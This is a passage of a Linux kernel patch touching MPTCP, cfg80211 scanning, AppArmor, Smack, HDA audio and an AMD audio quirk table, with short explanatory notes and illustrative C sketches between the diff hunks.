+@@ -3854,7 +3860,7 @@ static int mptcp_listen(struct socket *sock, int backlog)
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	lock_sock(sk);
+ 
+@@ -3889,7 +3895,7 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	/* Buggy applications can call accept on socket states other then LISTEN
+ 	 * but no need to allocate the first subflow just to error out.
+@@ -3963,7 +3969,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 	sock_poll_wait(file, sock, wait);
+ 
+ 	state = inet_sk_state_load(sk);
+-	pr_debug("msk=%p state=%d flags=%lx", msk, state, msk->flags);
++	pr_debug("msk=%p state=%d flags=%lx\n", msk, state, msk->flags);
+ 	if (state == TCP_LISTEN) {
+ 		struct socket *ssock = READ_ONCE(msk->subflow);
+ 
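
protocol.c also gains a behavioral fix in mptcp_close_ssk(): as the new comment notes, the first subflow can already be closed while still sitting on the connection list, so a close_event_done latch ensures the MPTCP_EVENT_SUB_CLOSED notification fires at most once per subflow. The latch reduced to plain C:

#include <stdbool.h>

struct subflow {
	bool close_event_done;
	/* ... */
};

static void close_subflow(struct subflow *sf)
{
	if (sf->close_event_done)
		return;			/* event already emitted */
	sf->close_event_done = true;

	/* ... emit the closed event and tear the subflow down ... */
}
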
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index c3cd68edab779..ee3974b10ef05 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -479,7 +479,9 @@ struct mptcp_subflow_context {
+ 		can_ack : 1,        /* only after processing the remote a key */
+ 		disposable : 1,	    /* ctx can be free at ulp release time */
+ 		stale : 1,	    /* unable to snd/rcv data, do not use for xmit */
+-		valid_csum_seen : 1;        /* at least one csum validated */
++		valid_csum_seen : 1,        /* at least one csum validated */
++		close_event_done : 1,       /* has done the post-closed part */
++		__unused : 9;
+ 	enum mptcp_data_avail data_avail;
+ 	u32	remote_nonce;
+ 	u64	thmac;
+@@ -837,8 +839,6 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+-void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+-					struct list_head *rm_list);
+ 
+ void mptcp_free_local_addr_list(struct mptcp_sock *msk);
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info);
+@@ -975,7 +975,7 @@ static inline bool mptcp_check_fallback(const struct sock *sk)
+ static inline void __mptcp_do_fallback(struct mptcp_sock *msk)
+ {
+ 	if (test_bit(MPTCP_FALLBACK_DONE, &msk->flags)) {
+-		pr_debug("TCP fallback already done (msk=%p)", msk);
++		pr_debug("TCP fallback already done (msk=%p)\n", msk);
+ 		return;
+ 	}
+ 	set_bit(MPTCP_FALLBACK_DONE, &msk->flags);
+@@ -1002,7 +1002,7 @@ static inline void mptcp_do_fallback(struct sock *ssk)
+ 	}
+ }
+ 
+-#define pr_fallback(a) pr_debug("%s:fallback to TCP (msk=%p)", __func__, a)
++#define pr_fallback(a) pr_debug("%s:fallback to TCP (msk=%p)\n", __func__, a)
+ 
+ static inline bool mptcp_check_infinite_map(struct sk_buff *skb)
+ {
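
One detail in the protocol.h hunk is worth noting when extending C bitfields: the new close_event_done : 1 flag arrives together with an explicit __unused : 9 pad, so the flags word keeps a fixed total width and later flags consume the pad instead of silently growing the struct. For example:

#include <stdio.h>

struct flags_word {
	unsigned int mp_capable : 1,
		     close_event_done : 1,
		     __unused : 30;	/* explicit remainder of one 32-bit word */
};

int main(void)
{
	/* stays a single word however the bits are carved up */
	printf("%zu\n", sizeof(struct flags_word));	/* typically prints 4 */
	return 0;
}

The field names here are illustrative; the real struct packs many more 1-bit flags ahead of the pad.
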
+diff --git a/net/mptcp/sockopt.c b/net/mptcp/sockopt.c
+index ff82fc062ae76..766797ace9426 100644
+--- a/net/mptcp/sockopt.c
++++ b/net/mptcp/sockopt.c
+@@ -881,7 +881,7 @@ int mptcp_setsockopt(struct sock *sk, int level, int optname,
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct sock *ssk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	if (level == SOL_SOCKET)
+ 		return mptcp_setsockopt_sol_socket(msk, optname, optval, optlen);
+@@ -1292,7 +1292,7 @@ int mptcp_getsockopt(struct sock *sk, int level, int optname,
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+ 	struct sock *ssk;
+ 
+-	pr_debug("msk=%p", msk);
++	pr_debug("msk=%p\n", msk);
+ 
+ 	/* @@ the meaning of setsockopt() when the socket is connected and
+ 	 * there are multiple subflows is not yet defined. It is up to the
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 1a92c8edd0a0e..dc3666298beff 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -39,7 +39,7 @@ static void subflow_req_destructor(struct request_sock *req)
+ {
+ 	struct mptcp_subflow_request_sock *subflow_req = mptcp_subflow_rsk(req);
+ 
+-	pr_debug("subflow_req=%p", subflow_req);
++	pr_debug("subflow_req=%p\n", subflow_req);
+ 
+ 	if (subflow_req->msk)
+ 		sock_put((struct sock *)subflow_req->msk);
+@@ -145,7 +145,7 @@ static int subflow_check_req(struct request_sock *req,
+ 	struct mptcp_options_received mp_opt;
+ 	bool opt_mp_capable, opt_mp_join;
+ 
+-	pr_debug("subflow_req=%p, listener=%p", subflow_req, listener);
++	pr_debug("subflow_req=%p, listener=%p\n", subflow_req, listener);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* no MPTCP if MD5SIG is enabled on this socket or we may run out of
+@@ -218,7 +218,7 @@ static int subflow_check_req(struct request_sock *req,
+ 		}
+ 
+ 		if (subflow_use_different_sport(subflow_req->msk, sk_listener)) {
+-			pr_debug("syn inet_sport=%d %d",
++			pr_debug("syn inet_sport=%d %d\n",
+ 				 ntohs(inet_sk(sk_listener)->inet_sport),
+ 				 ntohs(inet_sk((struct sock *)subflow_req->msk)->inet_sport));
+ 			if (!mptcp_pm_sport_in_anno_list(subflow_req->msk, sk_listener)) {
+@@ -237,7 +237,7 @@ static int subflow_check_req(struct request_sock *req,
+ 				return -EPERM;
+ 		}
+ 
+-		pr_debug("token=%u, remote_nonce=%u msk=%p", subflow_req->token,
++		pr_debug("token=%u, remote_nonce=%u msk=%p\n", subflow_req->token,
+ 			 subflow_req->remote_nonce, subflow_req->msk);
+ 	}
+ 
+@@ -415,7 +415,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 	subflow->rel_write_seq = 1;
+ 	subflow->conn_finished = 1;
+ 	subflow->ssn_offset = TCP_SKB_CB(skb)->seq;
+-	pr_debug("subflow=%p synack seq=%x", subflow, subflow->ssn_offset);
++	pr_debug("subflow=%p synack seq=%x\n", subflow, subflow->ssn_offset);
+ 
+ 	mptcp_get_options(skb, &mp_opt);
+ 	if (subflow->request_mptcp) {
+@@ -434,7 +434,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->mp_capable = 1;
+ 		subflow->can_ack = 1;
+ 		subflow->remote_key = mp_opt.sndr_key;
+-		pr_debug("subflow=%p, remote_key=%llu", subflow,
++		pr_debug("subflow=%p, remote_key=%llu\n", subflow,
+ 			 subflow->remote_key);
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEACTIVEACK);
+ 		mptcp_finish_connect(sk);
+@@ -451,7 +451,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->thmac = mp_opt.thmac;
+ 		subflow->remote_nonce = mp_opt.nonce;
+ 		WRITE_ONCE(subflow->remote_id, mp_opt.join_id);
+-		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d",
++		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d\n",
+ 			 subflow, subflow->thmac, subflow->remote_nonce,
+ 			 subflow->backup);
+ 
+@@ -477,7 +477,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKBACKUPRX);
+ 
+ 		if (subflow_use_different_dport(mptcp_sk(parent), sk)) {
+-			pr_debug("synack inet_dport=%d %d",
++			pr_debug("synack inet_dport=%d %d\n",
+ 				 ntohs(inet_sk(sk)->inet_dport),
+ 				 ntohs(inet_sk(parent)->inet_dport));
+ 			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINPORTSYNACKRX);
+@@ -548,7 +548,7 @@ static int subflow_v4_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	/* Never answer to SYNs sent to broadcast or multicast */
+ 	if (skb_rtable(skb)->rt_flags & (RTCF_BROADCAST | RTCF_MULTICAST))
+@@ -579,7 +579,7 @@ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(sk);
+ 
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	if (skb->protocol == htons(ETH_P_IP))
+ 		return subflow_v4_conn_request(sk, skb);
+@@ -697,7 +697,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+-	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
++	pr_debug("listener=%p, req=%p, conn=%p\n", listener, req, listener->conn);
+ 
+ 	/* After child creation we must look for MPC even when options
+ 	 * are not parsed
+@@ -788,7 +788,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 			ctx->conn = (struct sock *)owner;
+ 
+ 			if (subflow_use_different_sport(owner, sk)) {
+-				pr_debug("ack inet_sport=%d %d",
++				pr_debug("ack inet_sport=%d %d\n",
+ 					 ntohs(inet_sk(sk)->inet_sport),
+ 					 ntohs(inet_sk((struct sock *)owner)->inet_sport));
+ 				if (!mptcp_pm_sport_in_anno_list(owner, sk)) {
+@@ -845,7 +845,7 @@ enum mapping_status {
+ 
+ static void dbg_bad_map(struct mptcp_subflow_context *subflow, u32 ssn)
+ {
+-	pr_debug("Bad mapping: ssn=%d map_seq=%d map_data_len=%d",
++	pr_debug("Bad mapping: ssn=%d map_seq=%d map_data_len=%d\n",
+ 		 ssn, subflow->map_subflow_seq, subflow->map_data_len);
+ }
+ 
+@@ -1005,7 +1005,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 
+ 	data_len = mpext->data_len;
+ 	if (data_len == 0) {
+-		pr_debug("infinite mapping received");
++		pr_debug("infinite mapping received\n");
+ 		MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_INFINITEMAPRX);
+ 		subflow->map_data_len = 0;
+ 		return MAPPING_INVALID;
+@@ -1015,7 +1015,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 		if (data_len == 1) {
+ 			bool updated = mptcp_update_rcv_data_fin(msk, mpext->data_seq,
+ 								 mpext->dsn64);
+-			pr_debug("DATA_FIN with no payload seq=%llu", mpext->data_seq);
++			pr_debug("DATA_FIN with no payload seq=%llu\n", mpext->data_seq);
+ 			if (subflow->map_valid) {
+ 				/* A DATA_FIN might arrive in a DSS
+ 				 * option before the previous mapping
+@@ -1040,7 +1040,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				data_fin_seq &= GENMASK_ULL(31, 0);
+ 
+ 			mptcp_update_rcv_data_fin(msk, data_fin_seq, mpext->dsn64);
+-			pr_debug("DATA_FIN with mapping seq=%llu dsn64=%d",
++			pr_debug("DATA_FIN with mapping seq=%llu dsn64=%d\n",
+ 				 data_fin_seq, mpext->dsn64);
+ 		}
+ 
+@@ -1087,7 +1087,7 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 	if (unlikely(subflow->map_csum_reqd != csum_reqd))
+ 		return MAPPING_INVALID;
+ 
+-	pr_debug("new map seq=%llu subflow_seq=%u data_len=%u csum=%d:%u",
++	pr_debug("new map seq=%llu subflow_seq=%u data_len=%u csum=%d:%u\n",
+ 		 subflow->map_seq, subflow->map_subflow_seq,
+ 		 subflow->map_data_len, subflow->map_csum_reqd,
+ 		 subflow->map_data_csum);
+@@ -1122,7 +1122,7 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ 	avail_len = skb->len - offset;
+ 	incr = limit >= avail_len ? avail_len + fin : limit;
+ 
+-	pr_debug("discarding=%d len=%d offset=%d seq=%d", incr, skb->len,
++	pr_debug("discarding=%d len=%d offset=%d seq=%d\n", incr, skb->len,
+ 		 offset, subflow->map_subflow_seq);
+ 	MPTCP_INC_STATS(sock_net(ssk), MPTCP_MIB_DUPDATA);
+ 	tcp_sk(ssk)->copied_seq += incr;
+@@ -1231,7 +1231,7 @@ static bool subflow_check_data_avail(struct sock *ssk)
+ 
+ 		old_ack = READ_ONCE(msk->ack_seq);
+ 		ack_seq = mptcp_subflow_get_mapped_dsn(subflow);
+-		pr_debug("msk ack_seq=%llx subflow ack_seq=%llx", old_ack,
++		pr_debug("msk ack_seq=%llx subflow ack_seq=%llx\n", old_ack,
+ 			 ack_seq);
+ 		if (unlikely(before64(ack_seq, old_ack))) {
+ 			mptcp_subflow_discard_data(ssk, skb, old_ack - ack_seq);
+@@ -1303,7 +1303,7 @@ bool mptcp_subflow_data_available(struct sock *sk)
+ 		subflow->map_valid = 0;
+ 		WRITE_ONCE(subflow->data_avail, MPTCP_SUBFLOW_NODATA);
+ 
+-		pr_debug("Done with mapping: seq=%u data_len=%u",
++		pr_debug("Done with mapping: seq=%u data_len=%u\n",
+ 			 subflow->map_subflow_seq,
+ 			 subflow->map_data_len);
+ 	}
+@@ -1403,7 +1403,7 @@ void mptcpv6_handle_mapped(struct sock *sk, bool mapped)
+ 
+ 	target = mapped ? &subflow_v6m_specific : subflow_default_af_ops(sk);
+ 
+-	pr_debug("subflow=%p family=%d ops=%p target=%p mapped=%d",
++	pr_debug("subflow=%p family=%d ops=%p target=%p mapped=%d\n",
+ 		 subflow, sk->sk_family, icsk->icsk_af_ops, target, mapped);
+ 
+ 	if (likely(icsk->icsk_af_ops == target))
+@@ -1497,7 +1497,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 		goto failed;
+ 
+ 	mptcp_crypto_key_sha(subflow->remote_key, &remote_token, NULL);
+-	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d", msk,
++	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d\n", msk,
+ 		 remote_token, local_id, remote_id);
+ 	subflow->remote_token = remote_token;
+ 	WRITE_ONCE(subflow->remote_id, remote_id);
+@@ -1626,7 +1626,7 @@ int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
+ 	SOCK_INODE(sf)->i_gid = SOCK_INODE(sk->sk_socket)->i_gid;
+ 
+ 	subflow = mptcp_subflow_ctx(sf->sk);
+-	pr_debug("subflow=%p", subflow);
++	pr_debug("subflow=%p\n", subflow);
+ 
+ 	*new_sock = sf;
+ 	sock_hold(sk);
+@@ -1650,7 +1650,7 @@ static struct mptcp_subflow_context *subflow_create_ctx(struct sock *sk,
+ 	INIT_LIST_HEAD(&ctx->node);
+ 	INIT_LIST_HEAD(&ctx->delegated_node);
+ 
+-	pr_debug("subflow=%p", ctx);
++	pr_debug("subflow=%p\n", ctx);
+ 
+ 	ctx->tcp_sock = sk;
+ 	WRITE_ONCE(ctx->local_id, -1);
+@@ -1803,7 +1803,7 @@ static int subflow_ulp_init(struct sock *sk)
+ 		goto out;
+ 	}
+ 
+-	pr_debug("subflow=%p, family=%d", ctx, sk->sk_family);
++	pr_debug("subflow=%p, family=%d\n", ctx, sk->sk_family);
+ 
+ 	tp->is_mptcp = 1;
+ 	ctx->icsk_af_ops = icsk->icsk_af_ops;
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 3cd162e53173b..d18716e5b2cc2 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -1534,7 +1534,7 @@ struct cfg80211_bss *cfg80211_get_bss(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL(cfg80211_get_bss);
+ 
+-static void rb_insert_bss(struct cfg80211_registered_device *rdev,
++static bool rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 			  struct cfg80211_internal_bss *bss)
+ {
+ 	struct rb_node **p = &rdev->bss_tree.rb_node;
+@@ -1550,7 +1550,7 @@ static void rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 
+ 		if (WARN_ON(!cmp)) {
+ 			/* will sort of leak this BSS */
+-			return;
++			return false;
+ 		}
+ 
+ 		if (cmp < 0)
+@@ -1561,6 +1561,7 @@ static void rb_insert_bss(struct cfg80211_registered_device *rdev,
+ 
+ 	rb_link_node(&bss->rbn, parent, p);
+ 	rb_insert_color(&bss->rbn, &rdev->bss_tree);
++	return true;
+ }
+ 
+ static struct cfg80211_internal_bss *
+@@ -1587,6 +1588,34 @@ rb_find_bss(struct cfg80211_registered_device *rdev,
+ 	return NULL;
+ }
+ 
++static void cfg80211_insert_bss(struct cfg80211_registered_device *rdev,
++				struct cfg80211_internal_bss *bss)
++{
++	lockdep_assert_held(&rdev->bss_lock);
++
++	if (!rb_insert_bss(rdev, bss))
++		return;
++	list_add_tail(&bss->list, &rdev->bss_list);
++	rdev->bss_entries++;
++}
++
++static void cfg80211_rehash_bss(struct cfg80211_registered_device *rdev,
++                                struct cfg80211_internal_bss *bss)
++{
++	lockdep_assert_held(&rdev->bss_lock);
++
++	rb_erase(&bss->rbn, &rdev->bss_tree);
++	if (!rb_insert_bss(rdev, bss)) {
++		list_del(&bss->list);
++		if (!list_empty(&bss->hidden_list))
++			list_del_init(&bss->hidden_list);
++		if (!list_empty(&bss->pub.nontrans_list))
++			list_del_init(&bss->pub.nontrans_list);
++		rdev->bss_entries--;
++	}
++	rdev->bss_generation++;
++}
++
+ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *rdev,
+ 				   struct cfg80211_internal_bss *new)
+ {
+@@ -1862,9 +1891,7 @@ cfg80211_bss_update(struct cfg80211_registered_device *rdev,
+ 			bss_ref_get(rdev, pbss);
+ 		}
+ 
+-		list_add_tail(&new->list, &rdev->bss_list);
+-		rdev->bss_entries++;
+-		rb_insert_bss(rdev, new);
++		cfg80211_insert_bss(rdev, new);
+ 		found = new;
+ 	}
+ 
+@@ -2651,10 +2678,7 @@ void cfg80211_update_assoc_bss_entry(struct wireless_dev *wdev,
+ 		if (!WARN_ON(!__cfg80211_unlink_bss(rdev, new)))
+ 			rdev->bss_generation++;
+ 	}
+-
+-	rb_erase(&cbss->rbn, &rdev->bss_tree);
+-	rb_insert_bss(rdev, cbss);
+-	rdev->bss_generation++;
++	cfg80211_rehash_bss(rdev, cbss);
+ 
+ 	list_for_each_entry_safe(nontrans_bss, tmp,
+ 				 &cbss->pub.nontrans_list,
+@@ -2662,9 +2686,7 @@ void cfg80211_update_assoc_bss_entry(struct wireless_dev *wdev,
+ 		bss = container_of(nontrans_bss,
+ 				   struct cfg80211_internal_bss, pub);
+ 		bss->pub.channel = chan;
+-		rb_erase(&bss->rbn, &rdev->bss_tree);
+-		rb_insert_bss(rdev, bss);
+-		rdev->bss_generation++;
++		cfg80211_rehash_bss(rdev, bss);
+ 	}
+ 
+ done:
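
The scan.c rework centralizes a basic rb-tree rule: a node's sort key must never change while the node is linked. cfg80211_rehash_bss() therefore erases the node, re-inserts it under its new key (the channel), and unlinks the entry entirely if the insert now collides, which rb_insert_bss() reports through its new bool return. A generic sketch of rekeying with the kernel rbtree API, using hypothetical types:

#include <linux/rbtree.h>

struct item {
	struct rb_node rbn;
	int key;
};

static bool item_insert(struct rb_root *root, struct item *it)
{
	struct rb_node **p = &root->rb_node, *parent = NULL;

	while (*p) {
		struct item *cur = rb_entry(*p, struct item, rbn);

		parent = *p;
		if (it->key == cur->key)
			return false;	/* duplicate key: caller must cope */
		p = it->key < cur->key ? &(*p)->rb_left : &(*p)->rb_right;
	}
	rb_link_node(&it->rbn, parent, p);
	rb_insert_color(&it->rbn, root);
	return true;
}

static bool item_rekey(struct rb_root *root, struct item *it, int new_key)
{
	rb_erase(&it->rbn, root);	/* unlink before touching the key */
	it->key = new_key;
	return item_insert(root, it);	/* false: entry fell out of the tree */
}
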
+diff --git a/security/apparmor/apparmorfs.c b/security/apparmor/apparmorfs.c
+index 7160e7aa58b94..ce7b2f43c3193 100644
+--- a/security/apparmor/apparmorfs.c
++++ b/security/apparmor/apparmorfs.c
+@@ -1687,6 +1687,10 @@ int __aafs_profile_mkdir(struct aa_profile *profile, struct dentry *parent)
+ 		struct aa_profile *p;
+ 		p = aa_deref_parent(profile);
+ 		dent = prof_dir(p);
++		if (!dent) {
++			error = -ENOENT;
++			goto fail2;
++		}
+ 		/* adding to parent that previously didn't have children */
+ 		dent = aafs_create_dir("profiles", dent);
+ 		if (IS_ERR(dent))
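
The apparmorfs fix applies the usual kernel error-unwind idiom: prof_dir() on the parent can return NULL, so the caller records an errno-style code and jumps to the shared cleanup label instead of dereferencing it. In miniature, with hypothetical helpers:

#include <errno.h>
#include <stddef.h>

struct dir;
struct dir *lookup_parent_dir(void);	/* hypothetical, may return NULL */
int create_child(struct dir *parent);	/* hypothetical */

static int mkdir_profile(void)
{
	struct dir *dent;
	int error;

	dent = lookup_parent_dir();
	if (!dent) {
		error = -ENOENT;	/* parent gone: unwind, don't deref */
		goto fail;
	}

	error = create_child(dent);
	if (error)
		goto fail;
	return 0;

fail:
	/* ... release anything acquired before the failure ... */
	return error;
}
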
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index b0a483e40c827..75b3e91d5a5f8 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4290,7 +4290,7 @@ static int smack_inet_conn_request(const struct sock *sk, struct sk_buff *skb,
+ 	rcu_read_unlock();
+ 
+ 	if (hskp == NULL)
+-		rc = netlbl_req_setattr(req, &skp->smk_netlabel);
++		rc = netlbl_req_setattr(req, &ssp->smk_out->smk_netlabel);
+ 	else
+ 		netlbl_req_delattr(req);
+ 
+diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c
+index dbf7aa88e0e31..992cf82da1024 100644
+--- a/sound/pci/hda/hda_generic.c
++++ b/sound/pci/hda/hda_generic.c
+@@ -4952,6 +4952,69 @@ void snd_hda_gen_stream_pm(struct hda_codec *codec, hda_nid_t nid, bool on)
+ }
+ EXPORT_SYMBOL_GPL(snd_hda_gen_stream_pm);
+ 
++/* forcibly mute the speaker output without caching; return true if updated */
++static bool force_mute_output_path(struct hda_codec *codec, hda_nid_t nid)
++{
++	if (!nid)
++		return false;
++	if (!nid_has_mute(codec, nid, HDA_OUTPUT))
++		return false; /* no mute, skip */
++	if (snd_hda_codec_amp_read(codec, nid, 0, HDA_OUTPUT, 0) &
++	    snd_hda_codec_amp_read(codec, nid, 1, HDA_OUTPUT, 0) &
++	    HDA_AMP_MUTE)
++		return false; /* both channels already muted, skip */
++
++	/* direct amp update without caching */
++	snd_hda_codec_write(codec, nid, 0, AC_VERB_SET_AMP_GAIN_MUTE,
++			    AC_AMP_SET_OUTPUT | AC_AMP_SET_LEFT |
++			    AC_AMP_SET_RIGHT | HDA_AMP_MUTE);
++	return true;
++}
++
++/**
++ * snd_hda_gen_shutup_speakers - Forcibly mute the speaker outputs
++ * @codec: the HDA codec
++ *
++ * Forcibly mute the speaker outputs, to be called at suspend or shutdown.
++ *
++ * The mute state done by this function isn't cached, hence the original state
++ * will be restored at resume.
++ *
++ * Return true if the mute state has been changed.
++ */
++bool snd_hda_gen_shutup_speakers(struct hda_codec *codec)
++{
++	struct hda_gen_spec *spec = codec->spec;
++	const int *paths;
++	const struct nid_path *path;
++	int i, p, num_paths;
++	bool updated = false;
++
++	/* if already powered off, do nothing */
++	if (!snd_hdac_is_power_on(&codec->core))
++		return false;
++
++	if (spec->autocfg.line_out_type == AUTO_PIN_SPEAKER_OUT) {
++		paths = spec->out_paths;
++		num_paths = spec->autocfg.line_outs;
++	} else {
++		paths = spec->speaker_paths;
++		num_paths = spec->autocfg.speaker_outs;
++	}
++
++	for (i = 0; i < num_paths; i++) {
++		path = snd_hda_get_path_from_idx(codec, paths[i]);
++		if (!path)
++			continue;
++		for (p = 0; p < path->depth; p++)
++			if (force_mute_output_path(codec, path->path[p]))
++				updated = true;
++	}
++
++	return updated;
++}
++EXPORT_SYMBOL_GPL(snd_hda_gen_shutup_speakers);
++
+ /**
+  * snd_hda_gen_parse_auto_config - Parse the given BIOS configuration and
+  * set up the hda_gen_spec
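
The new snd_hda_gen_shutup_speakers() helper deliberately mutes through snd_hda_codec_write() rather than the cached amp helpers: as its kerneldoc says, the mute never enters the amp cache, so the normal resume path restores the user's previous state on its own. The Conexant hunk further down shows the intended call site; a sketch of such a hook, assuming a codec driver built on the generic parser:

/* sketch: mute speakers before cutting power, as patch_conexant.c does */
#include "hda_generic.h"

static void my_codec_shutdown(struct hda_codec *codec)
{
	/* uncached mute: resume restores the previous amp state */
	snd_hda_gen_shutup_speakers(codec);

	/* ... then disable EAPD and drop the codec into D3 ... */
}
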
+diff --git a/sound/pci/hda/hda_generic.h b/sound/pci/hda/hda_generic.h
+index 34eba40cc6e67..fb3ce68e2d717 100644
+--- a/sound/pci/hda/hda_generic.h
++++ b/sound/pci/hda/hda_generic.h
+@@ -352,5 +352,6 @@ int snd_hda_gen_add_mute_led_cdev(struct hda_codec *codec,
+ int snd_hda_gen_add_micmute_led_cdev(struct hda_codec *codec,
+ 				     int (*callback)(struct led_classdev *,
+ 						     enum led_brightness));
++bool snd_hda_gen_shutup_speakers(struct hda_codec *codec);
+ 
+ #endif /* __SOUND_HDA_GENERIC_H */
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index af921364195e4..8396d1d93668c 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -205,6 +205,8 @@ static void cx_auto_shutdown(struct hda_codec *codec)
+ {
+ 	struct conexant_spec *spec = codec->spec;
+ 
++	snd_hda_gen_shutup_speakers(codec);
++
+ 	/* Turn the problematic codec into D3 to avoid spurious noises
+ 	   from the internal speaker during (and after) reboot */
+ 	cx_auto_turn_eapd(codec, spec->num_eapds, spec->eapds, false);
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index b4a40a880035c..de655f687dd7d 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -220,6 +220,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21J6"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "21M3"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
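
The acp6x-mach.c hunk is a routine DMI quirk addition: one more Lenovo board (product 21M3) matched on vendor plus product name. Tables like this are consumed through the kernel's DMI helpers; a sketch of the lookup side, reusing the field names from the entry above (the table and function names here are illustrative):

#include <linux/dmi.h>

static const struct dmi_system_id quirk_table[] = {
	{
		.driver_data = (void *)"acp6x_card",
		.matches = {
			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
			DMI_MATCH(DMI_PRODUCT_NAME, "21M3"),
		}
	},
	{ }	/* zeroed terminator is mandatory */
};

static const char *lookup_quirk(void)
{
	const struct dmi_system_id *id = dmi_first_match(quirk_table);

	return id ? id->driver_data : NULL;	/* NULL: no quirk applies */
}
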
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index a73358d753aa7..33c002c26604d 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -402,9 +402,10 @@ reset_with_tcp_filter()
+ 	local ns="${!1}"
+ 	local src="${2}"
+ 	local target="${3}"
++	local chain="${4:-INPUT}"
+ 
+ 	if ! ip netns exec "${ns}" ${iptables} \
+-			-A INPUT \
++			-A "${chain}" \
+ 			-s "${src}" \
+ 			-p tcp \
+ 			-j "${target}"; then
+@@ -956,8 +957,6 @@ do_transfer()
+ 				dp=$(grep "type:10" "$evts_ns1" |
+ 				     sed -n 's/.*\(dport:\)\([[:digit:]]*\).*$/\2/p;q')
+ 				ip netns exec ${listener_ns} ./pm_nl_ctl rem token $tk id $id
+-				ip netns exec ${listener_ns} ./pm_nl_ctl dsf lip "$addr" \
+-							lport $sp rip $da rport $dp token $tk
+ 			fi
+ 
+ 			counter=$((counter + 1))
+@@ -1023,7 +1022,6 @@ do_transfer()
+ 				sleep 1
+ 				sp=$(grep "type:10" "$evts_ns2" |
+ 				     sed -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q')
